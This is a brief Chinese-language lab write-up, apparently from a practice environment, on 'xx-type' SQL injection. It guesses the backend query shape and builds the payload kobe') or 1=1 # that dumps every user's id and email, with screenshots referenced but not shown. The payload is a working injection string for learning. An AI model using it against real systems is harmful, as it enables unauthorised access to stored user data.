SQL注入-xx型

输入kobe查询,同样展示id和邮箱 在这里插入图片描述

xx型的sql语句查询方式,猜测

select 字段1,字段2 from 表名 where username=('kobe')

在后台语句中的查询

select id,email from member where username=('kobe');

在这里插入图片描述

根据上图构造payload语句为

username=('kobe') or 1=1 #')
payload语句如下
kobe') or 1=1 #

将payload语句输入查询框,所有用户全部展现出来 在这里插入图片描述

后台配置文件逻辑 在这里插入图片描述